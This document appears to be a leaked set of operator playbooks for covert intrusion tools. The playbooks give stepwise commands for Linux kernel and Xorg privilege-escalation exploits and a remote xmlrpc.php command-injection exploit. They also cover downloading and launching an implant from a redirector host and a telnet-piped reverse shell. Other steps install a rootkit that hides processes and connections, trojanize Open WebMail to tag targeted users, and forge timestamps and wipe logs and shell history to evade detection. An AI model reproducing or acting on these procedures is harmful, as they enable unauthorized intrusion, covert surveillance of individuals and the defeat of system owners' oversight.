SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID -E PRIVILEGED_NOPEN_PID -k
PRIVILEGED_NOPEN_PID
## can replace PRIVILEGED_NOPEN_PID with the PID of any process you'd like to hi
de
## Find your nopen connections -- consider narrowing the search as you probably
also
## already know your connection ip and port
netstat -an | grep REDIRECTOR_IP
## set Nopen Port in the rest of the script
mx
`x
## Find nopen using the privileged process. Verifies you can find Nopen in
## ps and netstat listings when privileged
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an |grep NOPEN_PORT
## in an unprivileged window, these should unsuccessful if Nopen was cloaked
## in an earlier Ctrl command
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an | grep NOPEN_PORT
## You should now be able to see the cloaked directory
## The cloaked directory MAY be in one of the following. Refer to what
## the `pwd` from Dewdrop returned
-lt /var/tmp
-lt /lib
-lt /dev
-lt /etc
-lt /
### APPENDIX
## DATE Errors
##
## 1 LOADER_ERROR_UNKNOWN
## The requested action failed for an unknown reason.
## 2 LOADER_ERROR_MEMORY
## There was a problem allocating memory.
## 3 LOADER_ERROR_READ_FILE
## There was a problem reading file data.
## 4 LOADER_ERROR_EXTRACT_PAYLOAD
## Could not extract payload data.
## 5 LOADER_ERROR_INVALID_PAYLOAD
## Payload data is invalid.
## 6 LOADER_ERROR_MERGE_ARCHIVE
## Could not merge old archive with new during an upgrade.
## 7 LOADER_ERROR_GENERATE_PAYLOAD
## Could not generate new payload data during an upgrade.
## 8 LOADER_ERROR_BUFFER_TOO_SMALL
## The given buffer is too small to hold the requested data.
## 9 LOADER_ERROR_LIST_BUFFER_TOO_SMALL
## The given array is too small to hold all the requested data elements.
## 10 LOADER_ERROR_SYSINFO
## Could not determine the host system information.
## 11 LOADER_ERROR_ENUMERATE_PLATFORM_TAGS
## Could not enumerate platform types.
## 12 LOADER_ERROR_ENUMERATE_OBJECTS
## Could not enumerate objects associated with a tag.
## 13 LOADER_ERROR_READ_OBJECT
## Could not read object data or meta-data.
## 14 LOADER_ERROR_WRITE_OBJECT
## Could not write object data or meta-data.
## 15 LOADER_ERROR_LOAD_USER_MODULE_OBJECT
## Could not load a user module data object.
## 16 LOADER_ERROR_EXECUTE_OBJECT
## Could not execute an executable data object.
## 17 LOADER_ERROR_KERNEL_SHUTDOWN
## Could not unload existing kernel modules.
## 18 LOADER_ERROR_KERNEL_PLATFORM
## Payload does not contain any kernel modules for this platform.
## 19 LOADER_ERROR_KERNEL_INJECT
## Could not inject modules into the running kernel.
## 20 LOADER_ERROR_KERNEL_INVOKE
## Could not invoke a required kernel service.
## 21 LOADER_ERROR_PERSIST_ENABLE
## Could not enable persistence.
## 22 LOADER_ERROR_PERSIST_READ
## Could not read persistant executable.
## 23 LOADER_ERROR_HOSTID
## Hostid of system did not match the one stored in the archive.
## 24 LOADER_ERROR_EXECL
## Error calling execl(3) when invoking the 64-bit version of the Loader.
## 25 LOADER_ERROR_FORK
## Error calling fork(2) when invoking the 64-bit version of the Loader.
## 26 LOADER_ERROR_WAITPID
## Error calling waitpid(2) when invoking the 64-bit version of the Loader.
## 27 LOADER_ERROR_SIGACTION
## Error calling sigaction(2) when setting the Loader process signal handle
rs.
## 28 LOADER_ERROR_SIGADDSET
## Error calling sigaddset(2) when setting the Loader process signal handle
rs.
################################################################################
###
###
### END File user.tool.stoicsurgeon.COMMON
### (see also ../etc/user.tool.stoicsurgeon.COMMON)
###
### BEGIN File user.tool.dittlelight_hidelite.COMMON (see also ../etc/user.too
l.dittlelight_hidelite.COMMON)
###
############################################################
# DITTLELIGHT (HIDELIGHT)
############################################################
### To run the unix oracle db scripts, you must do them outside of an INCISION p
rocess
### therefore, you can use DITTLELIGHT (HIDELITE) to unhide your nopen window
### You must run HIDELIGHT on a process with a parent PID of "1" so
### do a callback to your redirector and run hidelite on the callback window
### Hidelite
### Create a callback window
# On redirector:
-nrtun NOPEN_PORT
# On target:
-call REDIR_IP NOPEN_PORT
### upload the correct version of hidelite for sparc or linux in a temp director
y:
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/hidelite.sparc crond
# or
-put /current/bin/hidelite.linux crond
### Obtain the PIDs of your nopen windows.

### The callback window will have a parent pid of (1):
### Run -pid in each nopen window:
-pid
### In a nopen window OTHER than the callback window you are about to unhide,
### run hidelite to unhide the callback window:
./crond -u -p NOPEN_CALLBACK_WINDOW_PID
### Remove hidelite from the target:
-rm crond
### In the CALLBACK window, verify that this window has now lost its INCISION pr
ivileges
### and can no longer see the other nopen PIDS
ps -ef | grep NOPEN_PID
### In any window, you can run =psdiff to verify that either the callback window
is
### unhidden or that the other (INCISION privileged) nopen windows are invisible
### to the callback window.
=psdiff
### You can now run the oracle queries in the UNHIDDEN CALLBACK window.
### When done, simply -exit the unhidden callback window.
### If for some reason you need to rehide a process, upload HIDELITE
### and run the following from a HIDDEN (privileged) window:
### To hide again
./crond -h -p NOPENPID
-rm crond
### If you were running oracle commands, you can now clean them up:
### Cleanup the logs created from the oracle scripts:
### ex:
# -ls -t /opt/mnt/oracle/product/9.2.0/rdbms/audit
# -rm <NEW_FILES>
# -touch /opt/mnt/oracle/product/9.2.0/rdbms/audit/ora_1473.aud /opt/mnt/oracle/
product/9.2.0/rdbms/audit
### Remove your working directory and -burn nopen when done with op
-cd /tmp
-rm .scsi
-lt /tmp
-burnBURN
###
### END File user.tool.dittlelight_hidelite.COMMON
### (see also ../etc/user.tool.dittlelight_hidelite.COMMON)
###
### BEGIN File user.tool.draftbagger.COMMON (see also ../etc/user.tool.draftba
gger.COMMON)
###
##### DRAFTBAGGER #####
### Assumes have already talked to SNAT via SnatLp
### Search/replace commands
:%s/ROUTER_IP/ROUTER_IP/g
:%s/PROXY_IP/PROXY_IP/g
:%s/RADIUS_IP/RADIUS_IP/g
:%s/RANDOM_HIGH/RANDOM_HIGH/g
### These aren't really means to be used as search/replace in this script, more
### placeholders for the example commands, but here are the commands anyway,
### commented out so you really shouldn't run them
#:%s/LOCAL_TUNNEL_COMMANDS_PORT/LOCAL_TUNNEL_COMMANDS_PORT/g
#:%s/NOPEN_PID/NOPEN_PID/g
#:%s/PARTIAL_MATCH_TARGS/PARTIAL_MATCH_TARGS/g
#:%s/EXACT_MATCH_TARGS/EXACT_MATCH_TARGS/g
### get the date of the current radius log on the radius server
-lt /var/log/radius/ # (find the most current, should be last file in list)
-lt /var/log/radius/<date> # (file needed is the acct.log file)
### run the following from radius server

-gs parse_rads -h # (for -gs parse_rads usage syntax)
-gs parse_rads ROUTER_IP RANDOM_HIGH /var/log/radius/CURRENT_DATE/acct.log
### Will check to make sure the log file exists, check to makes sure the
### "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp" command was run, and then
### starts a "tail -f" on the logfile to constantly bring the file home,
### this gives you two pastables: a "-tunnel PORT udp" command to run on the
### radius server, and a "parse_rads.pl" one to run in a locally scripted window
### run the "-tunnel" (use the one spit out, the one below is an example) on
### the box that will be talking to SNAT
-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp
### IN A LOCALLY SCRIPTED WINDOW (pastable given by -gs parse_rads command)

parse_rads.pl -h # for help with pastable options (run locally)
### Below is an example command, will need to use the pastable spit out by
### "-gs parse_rads" for the current session, but some things will need to
### be added to the command spit out, i.e. -p/-P args (phone numbers), the
### -R arg (treat already downloaded data as real-time, i.e. set up initial
### rules based on it), the IP address of the proxy, and any other stuff to
### play with
###
### -N -a -i are filled in by -gs parserads. Others need to be added manually
PORT=LOCAL_TUNNEL_COMMANDS_PORT parse_rads.pl -NRADIUS_IP:NOPEN_PID -a127.0.0.1:
RANDOM_HIGH -i/current/down/HOSTNAME.RADIUS_IP/var/log/radius/CURRENT_DATE/acct.
log -p PARTIAL_MATCH_TARGS -P EXACT_MATCH_TARGS -R PROXY_IP
### Will ask for pager numbers, and ask for confirmation that a sufficiently
### up-to-date version of SNAT is being used, go ahead and confirm these
### Should be able to get other instructions for DRAFTBAGGER UI
### when Op is complete, in the DB command window, run the following to close ou
t
### NOTE: ANSWER "no" TO THE PROMPT ASKING WHETHER TO KEEP THE SNAT
### FILTERS ACTIVE
diediedie
### Ctrl-C your "tail -f" command on RADIUS server, or kill the appropriate pid
### In a local window, you can use the scripts "closetunnel" and "dotunnel" to
### interact with a -tunnel listening on a port for commands rather than stdin
### (i.e. "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp")
### "dotunnel" will send all command line args to that port for -tunnel to get
### "closetunnel" has hard-coded "c 1 2 3 4 5 6 7", and then "q"...this will
### get the Nopen prompt back
# Examples:
dotunnel s
dotunnel l 1390 1.2.3.4 139
closetunnel
### CLOSE OUT THE REST OF THE OP AS YOU WOULD NORMALLY
###
### END File user.tool.draftbagger.COMMON
### (see also ../etc/user.tool.draftbagger.COMMON)
###
### BEGIN File user.tool.elgingamble.COMMON (see also ../etc/user.tool.elginga
mble.COMMON)
###
#######################################
# ELGINGAMBLE
#######################################
### local exploit for the following operating system versions:
### Linux 2.6.13 - 2.6.17.4 and certain distros that contain a backport of the
### vulnerable functionality
### Local exploit for the public prctl core dump vulnerability in recent Linux k
ernels.
### It takes advantage of an input validation/logic error in the kernel to creat
e
### a cron script that will spawn a root shell.
### OPSEC:
### vulnerability: public
### exploit: public
###
### CHECK IF TARGET IS VULNERABLE
###
### check OS (for Linux 2.6.13 - 2.6.17.4)
uname -a
### make sure crond is running:
ps -ef | grep crond
### check if you have READ permission on /etc/cron.d (WRITE is part of the vuln.
):
-lt /etc/cron.d
### make sure you have EXECUTE permission on crontab:
which crontab
-lt /usr/bin/crontab
### check if there is a cron.allow or cron.deny that might hinder your success:
-lt /etc/cron*
-cat /etc/cron.allow
-cat /etc/cron.deny
###
### if the above checks pass, you can try running it:
### USAGE:
# elgingamble:
# -h (optional) Prints a help message
# -d (optional) Used to specify the system cron directory (defaults /etc/cron.d
)
# -p (optional) Used to specify the core file prefix (defaults cron.PID)
# -s (optional) Used to specify a shell besides /bin/sh
# -t (optional) Used to specify the exploit timeout (defaults 5 minutes)
### upload to target:
-put /current/up/elgingamble eg
### within nopen, run it from within -shell
-shell
./eg
# You'll see the following messages, you must wait for the cronjob to run:
# can't set core limit, trying indirect
# crontab installed
# must do crontab -r when finished
# waiting for re-exec, ETA 60-120s
# after waiting for the cronjob, run the following and start a new noserver
# once you gain root access:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
PATH=. sendmail
### connect to privileged noserver:

-nstun TARGET_IP
### CLEANUP:
crontab -l
crontab -r
-lt /etc/cron.d
-rm /etc/cron.d/core.PID
-rm eg sendmail
-lt
### LOGS:
-lt /var/log/cron
-tail /var/log/cron
###
### TROUBLESHOOTING
###
# Exploit fails with message "kernel not vulnerable". The kernel is not vulnerab
le
# to exploitation.
# Remedy:None
# Exploit fails with message "failed: indirect". The exploit tried and failed to
# have cron call it indirectly to bypass resource limitations. This can occur if
# the crontab program is not installed, could not be found, or is restricted thr
ough
# the use of cron.allow and cron.deny.
# Remedy:Make sure crontab is installed on the system and useable by the system
# user you use to run the exploit.
# Exploit fails with message "failed". The exploit was unable to elevate to root
.
# This indicates that the cron command was never executed. One possible reason
for
# failure is if the coredump created in the system cron directory is too small t
o
# contain a valid cron command. Other reasons could be that the cron directory
# is not accessible by non-priveleged users, or the cron daemon is not running o
n the system.
# Remedy:Make sure the cron daemon is running and the user running the exploit
# has read access to the system cron directory. Also check the core file limit.
#
# Description: Any other failure message. Remedy: Make sure the default exploit
parameters,
# such as cron directory and core file prefix, are valid for the target system.
# If not, rerun the exploit and specify the appropriate parameters on the comman
d line.
###
### END File user.tool.elgingamble.COMMON
### (see also ../etc/user.tool.elgingamble.COMMON)
###
### BEGIN File user.tool.enoltog.COMMON (see also ../etc/user.tool.enoltog.COM
MON)
###
#######################################
# ENOLTOG
#######################################
### Software modification to the Open WebMail software to target specific users
of interest.
### Used to insert a FOXACID/HUFFMUSH tag.
### Version 1 will target the first five users to login into the system.
### Version 2 will target specific users.
### NOTE: Due to the uniqueness of each target and the source code modification
required,
### SUGGEST DEVELOPER BE PRESENT DURING INITIAL DEPLOYMENT TO TARGET!!!!!!
###
### OPSEC:
# anyone viewing the source file will be able to see the added code.
### INITIAL INSTALLATION PROCEDURE:

### access target
### pull original openwebmail file
locate openwebmail-main.pl
-get /var/www/cgi-bin/openwebmail/openwebmail-main.pl
###
### LOCALLY do the following:
###
### make a backup copy
cd /current/up
cp /current/down/HOSTNAME//var/www/cgi-bin/openwebmail/openwebmail-main.pl /curr
ent/up/openwebmail-main.pl
### edit ##ONE## of the following files, depending on the deployment type:
### For openwebmail-main-first-five-users.pl:
#############################################
# change the "<5" to the correct number of users
# change the target tag in the gif line - should NOT reuse the same
# target tag on different projects!!!!
### For openwebmail-main-users-time.pl:

#############################################
### determine the md5sum on each user:
echo -n USERNAME | md5sum
### use the md5sum as the tasking name in the lines that begin with "$md
5 eq"
# change the target tag in the gif line - should NOT reuse the same
# target tag on different projects!!!!
### next, edit the local copy of the original file, and insert the code from the
above
### step in the correct places
vi /current/up/m
###
### On target, upload the modified openwebmail:
###
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put openwebmail-main.pl m
-put openwebmail-test.pl o
### test that the version will first work:

./o
-ls
-strings rpm.db
-rm o rpm.db
### get ready to overwrite:
md5sum /var/www/cgi-bin/openwebmail/openwebmail-main.pl
diff /var/www/cgi-bin/openwebmail/openwebmail-main.pl m
-ls /var/www/cgi-bin/openwebmail
-ls
cat m > /var/www/cgi-bin/openwebmail/openwebmail-main.pl
### fix timestamps

-touch /var/www/cgi-bin/openwebmail/openwebmail-folder.pl /var/www/cgi-bin/openw
ebmail/openwebmail-main.pl
-ls /var/www/cgi-bin/openwebmail
###
### LOGGING:
###
locate access
-ls /var/log/httpd
-tail /var/log/httpd/access_log
tail -300 /var/log/httpd/access_log|grep openwebmail-main.pl
###
### CLEANUP DIRECTORY:
###
-rm m
-cd ..
-rm .scsi
-ls -t
### TROUBLESHOOTING:
# Determine the MD5 digest of the user
echo -n <USERNAME> | md5sum
# Determine if showthread.php is executable
-ls /var/www/cgi-bin/openwebmail/openwebmail-main.php
# upload and run test script openwebmail-test.pl
-put /current/up/openwebmail-test.pl o
./o
# should see
1
2
# clean up results
###
### END File user.tool.enoltog.COMMON
### (see also ../etc/user.tool.enoltog.COMMON)
###
### BEGIN File user.tool.excelberwick.COMMON (see also ../etc/user.tool.excelb
erwick.COMMON)
###
#######################################
# EXCELBERWICK
#######################################
### remote exploit against xmlrpc.php on Unix platforms
###
### WILL REQUIRE LOCAL ELEVATION
### sybil location: CGI-BIN
### Exploits a vulnerability in the XML-RPC PHP script. The vulnerable
### file is used in a large number of web applications, such as Drupal,
### b2evolution, and TikiWiki. The vulnerability is the result of
### unsanitized data being passed directly to the eval() call
### in the parseRequest() function of the XML-RPC server
### OPSEC:
### exploit: public
### Usage:
# ./xp_xmlrpc.pl
usage: ./xp_xmlrpc.pl -i<host> -d<dir/file> -c<commands to run>
-i <host/IP, ex: 127.0.0.1>
-d </directory/xmlrpc.php, ex: /drupal/xmlrpc.php>
-p <port, default: 80>
-o <turn off IDS mode>
-v <for virtual host: default -i>
-a <automatically exploit all known scripts. Very noisy.>
0: /xmlrpc.php
1: /blog/xmlrpc.php
2: /blog/xmlsrv/xmlrpc.php
3: /blogs/xmlsrv/xmlrpc.php
4: /drupal/xmlrpc.php
5: /phpgroupware/xmlrpc.php
6: /wordpress/xmlrpc.php
7: /xmlrpc/xmlrpc.php
8: /xmlsrv/xmlrpc.php
9: /b2/xmlsrv/xmlrpc.php
10: /b2evol/xmlsrv/xmlrpc.php
11: /community/xmlrpc.php
12: /blogs/xmlrpc.php
-c <commands to run>
Examples:
1) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"uname -a;ls -la;w"
2) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"(mkdir /tmp/.scsi;
cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -Osendmail;chmod +
x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null"
### Check if PHP is there:

# from redirector:
# The response should include "PHP/" though the version doesn't necessarily matt
er
# Ex. response: Server: Apache/2.0.40 (Red Hat Linux) mod_perl/1.99_05-dev Perl/
v5.8.0 mod_auth_pgsql/0.9.12 PHP/4.2.2 mod_python/3.0.0 Python/2.2.1 mod_ssl/2.0
.40 OpenSSL/0.9.6b DAV/2
mx
:%s/WEB_PORT/WEB_PORT/g
:%s/REDIR_IP/REDIR_IP/g
'x
### Then check if vulnerable by running the "-a" option to exhaust all options
# WEB-PORT is usually '80' unless the target is using something else, or you
# choose to tunnel it differently
# redirector:
-tunnel
l WEB_PORT TARGET_IP
# local script window:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -a -c"w"
### Look through the output; a successful hit will be followed by
### the results of the command issued by the "-c" option, in the suggested case,
### the results of "w'
### Each unsuccessful version will be followed by "404 not found" errors
### If the previous command yielded a successful attempt, then run the exploit a
gain
### but substitute the version that was successful instead of using "-a"
### Prepare the appropriate nopen version with an http header:

# Locally:
ls -l /current/up/noserver
file noserver
echo -e 'HTTP/1.0 200\n' > new
cat new ../up/morerats/noserver*-i586.pc.linux.gnu.redhat-5.0 > /current/up/send
mail
nc -l -v -p NETCAT_PORT < sendmail
# on redirector:
-nrtun NOPEN_PORT
### Replace "VERSION" with the appropriate php script, then run exploit to uploa
d and execute nopen:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -d"VERSION" -c"mkdir /tmp/.scsi; cd /tmp/.

scsi; /usr/bin/wget http://REDIR_IP:NETCAT_PORT/sendmail -Osendmail;chmod +x sen
dmail;D=-cREDIR_IP:NOPEN_PORT PATH=. sendmail) 2>/dev/null"
### connect:
-nstun TARGET_IP
###
### TROUBLESHOOTING:
###
# Try this to get interactive windows (you'll type in one, and get output in the
other):
mx
:%s/PORT1/PORT1/g
:%s/PORT2/PORT2/g
'x
# Local scripted window #1:
nc -l -vv -p PORT1

nc -l -vv -p PORT2

./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -d"VERSION" -c"sleep 100 | telnet REDIR_IP
PORT1 | /bin/sh | telnet REDIR_IP PORT2"
###
### CLEANUP:
###
# Logging directory depends on type of web software running on target (check -fi
nd):
# Try /var/log/httpd:
# access_log
# referer_log
# error_log
###
### END File user.tool.excelberwick.COMMON
### (see also ../etc/user.tool.excelberwick.COMMON)
###
### BEGIN File user.tool.dittoclass.COMMON (see also ../etc/user.tool.dittocla
ss.COMMON)
###
##### DITTOCLASS #####
### Search/replace commands
### OLD PKG NAME: if DC prev installed, name of pkg, if not then leave alone
### OLD DITTOCLASS DIR: if DC prev installed, directory where it was installed
### NEW PKG NAME: name of new DC installation package
### NEW DITTOCLASS DIR: directory where DC will be installed
:%s/OLD_PKG_NAME/OLD_PKG_NAME/g
:%s/OLD_DITTOCLASS_DIR/OLD_DITTOCLASS_DIR/g
:%s/NEW_PKG_NAME/NEW_PKG_NAME/g
:%s/NEW_DITTOCLASS_DIR/NEW_DITTOCLASS_DIR/g
### Check to see if DITTOCLASS already on target (if fails, not implanted).
### Make sure check for other implants too.
### NOTE: Must use "cat", "-cat" will not work
### Doing "cat /proc/OLD_PKG_NAME" will register you to see hidden resources
### If neither of the "cat" commands work and you think there is an old
### installation, the "ls" command below should still work, if not there is
### probably nothing there
cat /proc/listfiles
cat /proc/OLD_PKG_NAME
ls -la /OLD_DITTOCLASS_DIR/OLD_PKG_NAME
### If DITTOCLASS already there but needs to be upgraded, go ahead and

### uninstall it, if not skip to "Upload the DC package and run..."
-ls /OLD_DITTOCLASS_DIR/uninstall_OLD_PKG_NAME.sh
# If it exists
/OLD_DITTOCLASS_DIR/uninstall_OLD_PKG_NAME.sh
### After uninstall, in a NOPEN window, grep for the old package name
### and kill any of the processes associated with it
netstat -anlp | grep OLD_PKG_NAME
ps -ef | grep OLD_PKG_NAME
kill -9 OLD_PKG_NAME_PIDS
### Make sure old connections/processes gone

netstat -anlp | grep OLD_PKG_NAME
ps -ef | grep OLD_PKG_NAME
### Make sure unable to connect with hector if connected with hector before
# Use whatever command used to get on
cd /current/bin
hector .... # your previous hector command line
### Upload the DC package and run the install script

### Removes itself upon installation
-put /current/up/NEW_PKG_NAME.tar.gz m.tar.gz2
tar zxvf m.tar.gz
-lt
./install.sh
### Assuming installation script did not return any errors...

### Check to see if DC is seemingly working by seeing if the files are
### in fact being hidden
-lt /NEW_DITTOCLASS_DIR/ # should NOT see NEW_PKG_NAME in this listing
-lt /NEW_DITTOCLASS_DIR/NEW_PKG_NAME # SHOULD see NEW_PKG_NAME in this listing
### A little bit more search/replace fun

### TARGET IP: duh
### TARGET TRIGGER PORT: duh
### HECTOR CALLBACK IP: the IP for target to callback to (probably the window
### with the -tunnel)
### HECTORi CALLBACK PORT: the port for target to callback to
### RAWSEND PORT: local port to redirect the trigger packet
### SPOOF SRC IP: source IP of trigger packet
### BACKDOOR KEY: key to verify whether to call back or not
### should be located in:
### /current/bin/varkeys/projectname/ip.host/dittoclass
:%s/TARGET_TRIGGER_PORT/TARGET_TRIGGER_PORT/g
:%s/HECTOR_CALLBACK_IP/HECTOR_CALLBACK_IP/g
:%s/HECTOR_CALLBACK_PORT/HECTOR_CALLBACK_PORT/g
:%s/RAWSEND_PORT/RAWSEND_PORT/g
:%s/SPOOF_SRC_IP/SPOOF_SRC_IP/g
:%s/BACKDOOR_KEY/BACKDOOR_KEY/g
### Setup tunnel on redirector to contact agamemnon with hector

-tunnel
u TARGET_TRIGGER_PORT TARGET_IP
r HECTOR_CALLBACK_PORT
### Setup -rawsend for hector
-rawsend RAWSEND_PORT
##### Connect to agamemnon from LOCAL WINDOW
cd /current/bin
### For hector help in case need to play with the trigger line and the
### -tunnel stuff to get it right
./hector -v -h
./hector --backdoor --target-ip TARGET_IP --dest-port TARGET_TRIGGER_PORT --spoo
f-srcip SPOOF_IP --listen-port HECTOR_CALLBACK_PORT --control-ip HECTOR_CALLBACK
_IP --udp -Z 127.0.0.1:RAWSEND_PORT --backdoor-trigger BACKDOOR_KEY
### Once connected to target thru hector
mkdir /tmp/.pci
cd /tmp/.pci
!help!
### To send a file via hector
### NOTE: Assume the working dir on target is "/tmp/.dir"
### Uploading the filename "crond" will be named "/tmp/.dir/crond" on targ
et
### Uploading the filename "/etc/passwd" will be named "/tmp/.dir/_etc_pas
swd"
### on target
### Upload and run a NOPEN listener
!sendfile!
cp /current/up/morerats/NOPEN_TO_UPLOAD /current/bin/crond
crond # what called noserver in /current/down/HOSTNAME.TARGET_IP
PATH=. D=-lRANDOM_PORT crond
### From redirector:
-nstun TARGET_IP:RANDOM_PORT
### Or callbacks (may need to use this for multiple windows instead of -call)
PATH=. D=-cHECTOR_CALLBACK_IP:RANDOM_PORT crond
-nrtun RANDOM_PORT
-call HECTOR_CALLBACK_IP:RANDOM_PORT
### Register to be allowed to see hidden files/processes/conns

!register!
# Enter the new package name at prompt "Please enter the package name:"
NEW_PKG_NAME
# must see NEW_PKG_NAME> REGISTERED to know you are successful
### Hide processes and ports from hector window

# In each nopen window:
-pid
ps -auxww | grep crond
netstat -an | grep HECTOR_CALLBACK_IP
# Hide process in hector window (to unhide, run !unhideproc!)
!hideproc!
Please enter the Process ID you wish to unhide: PID_TO_HIDE
# Confirm in unregistered nopen window that pid is hidden
ps -auxww | grep PID_TO_HIDE
# Hide connection in hector window (to unhide, run !unhideconn!)
# NOTE: Always hide the end of the redirector, don't hide the target's
# Otherwise, legitimate connections might not show up
!hideconn!
Please enter the IP Address you wish to hide: HECTOR_CALLBACK_IP
Please enter the port you wish to hide: NOPEN_PORT
# Confirm in unregistered nopen window that conn is hidden
netstat -an | grep NOPEN_PORT
# make sure processes and connections are hidden
!listconns!
!listprocs!
# to exit hector
<ctrl><d>
### Startup script

### Can modify startup script to add strifeworld or other progs that
### need to be started on boot
-lt /etc/rc#.d/S55NEW_PKG_NAME
-get /etc/rc#.d/S55NEW_PKG_NAME
### After modified...
-put MODIFIED_SCRIPT s
touch -r /etc/rc#.d/S55NEW_PKG_NAME t
cat s > /etc/rc#.d/S55NEW_PKG_NAME
touch -r t /etc/rc#.d/S55NEW_PKG_NAME
-rm s t
####################################################################
###
### END File user.tool.dittoclass.COMMON
### (see also ../etc/user.tool.dittoclass.COMMON)
###
### BEGIN File user.tool.expitiatezeke.COMMON (see also ../etc/user.tool.expit
iatezeke.COMMON)
###
#############################
### EXPITIATEZEKE
#############################
### local exploit against the Linux 2.6.5 - 2.6.6 Fedora Core 2 kernel.
### EXPITIATEZEKE takes advantage of the chown vulnerability which allows
### you change the gid on any file on the system to the current users gid.
### This exploit is packaged into a single executable that when run
### will create a temporary file (shell spawning program), change the
### group owner of the device file of the partition that the temp file
### resides on (i.e. If the temp file was /tmp/file12345678 and /tmp was
### mounted on /dev/hdb3 then the device file /dev/hdb3 would have its
### group ownership changed.)
### After this takes place a cache flushing procedure occurs syncing the
### running filesystem with the contents of the disk.
### Once this finishes and if successful, a root shell is returned to the operat
or.
### OPSEC: vulnerability - public
### NOTE: This will cause a temporary CPU spike during execution; care should be
taken
### to determine the risk if there are active users on the target
###
### Get a "before" picture of the device where /tmp resides
###
# find the device that is mounted on /tmp (ex.- /dev/hdb3) and make note;
# if /tmp does not have its own filesystem, use the device of "/"
df -k
# look at the perms of the DEVICE, then make note of the group id; typically sho
uld be "disk"
# ex: -ls /dev/hdb3
-ls <DEVICENAME>
# correlate the groupid to a digit by finding it in /etc/group, then save the nu
meric value
# ex: -grep disk /etc/group
-grep <GROUPNAME> /etc/group
###
### upload and execute
###
-put /current/up/exze exze
# run the script (within nopen, use -shell)
-shell
./exze
### A status code will show up while the program is running.
### The following value should indicate potential success: 0x000 <gid on device
file>
### The <gid> should be the same as you found out from the initial checks
### MAKE NOTE OF THE VALUE REPORTED BACK ON THIS INITIAL ATTEMPT IN CASE OF FAIL
URE!!!
### Any value other than 0x000 is an error code (see other documentation)
### Wait about 5 minutes (for the cache flushing) and you should get a root prom
pt, then:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
# start a new noserver
PATH=. crond
###
### IF AT FIRST YOU DON'T SUCCEED....... try, try..... the following in order:
###
### If you received an error that permissions didn't change, you may try again.
### Next, try using the -r option. This option will prevent the temporary shell
### file from being removed if there is an error so that the operator will have
a chance
### to do the cache flushing manually.
-shell
./exze -r
### if successful, run the "unset"s from above - you have root and can cleanup
### If the 'permissions didn't change' error still happens, the flushing procedu
re
### will need to be performed manually before proceeding to the next step.
find / -type f -exec cat {} \; > /dev/null
### ONLY AFTER the 'find' completes, check the permissions of the shell file in
/tmp:
### should be rws--x--- and owned by root
### DO NOT EXECUTE, OPEN, READ, OR WRITE TO THE SHELL FILE BEFORE THE EXPLOI
T FINISHES
### AS IT MIGHT UNDO THE CHANGES MADE TO THE DISK!! THIS MEANS DO NOT DO AN LS
### ON THE FILE OR TOUCH IT IN ANY MANNER UNTIL THE EXPLOIT COMPLETES.
-lt /tmp
### if the permissions have changed, then manually attempt to get a root shell;
### the -d and -i options will attempt to perform the cleanup of the shell file
in /tmp
### and reset the group perms of the DEVICE
-lt /tmp
-shell
/tmp/file<######> -d <DEVICE> -i <GID>
### if you don't get root by now, you probably won't
###
### CLEANUP
###
### no cleanup if successful the first time, however....
### there may be cleanup involved under the following conditions:
### the exploit did NOT work on the first attempt
### the exploit was aborted
### the connection to target was dropped
### check the group id of the DEVICE where /tmp resides;
### if the group is not the same as it was originally, set it to
### the gid echoed back in your INITIAL ATTEMPT (digit following 0x000)
### NOTE: if you didn't get root, you may not be able to chgrp the device
### but hopefully, the exploit will have set it to gid '0' to be
### less conspicuous than that of your user's gid
-lt /dev/<DEVICENAME>
chgrp <GID> /dev/<DEVICENAME>
-lt /dev
# the shell file (/tmp/file######) may need to be cleaned up on target:

-lt /tmp
-rm /tmp/file*
# remove the binary from /tmp

-rm exze
###
### END File user.tool.expitiatezeke.COMMON
### (see also ../etc/user.tool.expitiatezeke.COMMON)
###
### BEGIN File user.tool.englandbogy.COMMON (see also ../etc/user.tool.england
bogy.COMMON)
###
#######################################
# ENGLANDBOGY
#######################################
### local exploit against Xorg for the following versions:
### Xorg X11R7 1.0.1, X11R7 1.0, X11R6 6.9
### Includes the following distributions:
### MandrakeSoft Linux 10.2, Ubuntu 5.0.4, SuSE Linux 10.0,
### RedHat Fedora Core5, MandrakeSoft Linux 2006.0
### Fails-on - Xorg X11R7 1.0.2 and greater and less than Xorg X11R6 6.9.
### Requirements - Target needs to have the Xorg binary as SETUID root.
###
### Exploits the Xorg X server by allowing unprivileged users load arbitrary mod
ules
### OPSEC:
### exploit: public
### Determine if vulnerable:
uname -a
### get Xorg version; should be one listed above:
Xorg -version
### see if Xorg is setuid root- should look similar to this (-rwsr-xr-x )
ls -la /usr/bin/Xorg
### if tests pass, let's do it:

-put /current/up/eb eb
-shell
./eb
# lots of output similar to this:
X Window System Version 6.9.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 6.9
Build Operating System: SuSE Linux [ELF] SuSE
Current Operating System: Linux linux 2.6.16-rc5-git2-2-default #1 Tue Fe
b 28 09 :16:17 UTC 2006 i686
Build Date: 26 February 2006
Before reporting problems, check http://wiki.X.Org
to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "Xorg.log", Time: Tue Jun 6 10:31:57 2006
(==) Using config file: "/etc/X11/xorg.conf"
(EE) LoadModule: Module bitmap does not have a bitmapModuleData data obje
ct.
(EE) Failed to load module "bitmap" (invalid module, 0)
